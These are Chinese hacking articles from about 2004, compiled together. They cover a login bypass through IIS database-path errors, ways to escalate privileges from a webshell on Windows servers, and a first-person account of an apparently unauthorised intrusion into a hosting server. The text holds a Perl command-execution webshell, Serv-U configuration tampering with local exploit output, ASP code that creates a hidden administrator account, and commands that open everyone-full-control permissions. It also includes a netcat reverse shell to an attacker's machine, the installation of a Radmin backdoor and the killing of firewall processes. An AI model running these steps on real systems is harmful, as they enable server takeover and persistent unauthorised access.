啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!
知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。
诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。
既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If
数据库找不到程序就结束了,呵呵,空欢喜一场。
接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。
我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。
总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录
至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^
提升权限终极技巧 作者:WekweN http://www.wrsky.com
本篇文章结合了许多高手提升权限的技巧和自己的一些想法
当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 破解工具本站已提供。请自己Search一下!
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "
\r\n", 13);\r\n", 17);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","WekweN$")
od.SetPassword "WekweN" <-----密码
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超级帐号建立成功!"%>
用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"
"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>
8.C:\Program Files\Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"
以上是本人的拙见,大家有什么好的方法多多分享
WekweN
04.12.12
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D:\Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe -e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc -l -p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
winNT/2000提升权限
Windows NT/2000 通用的提升方法
攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。
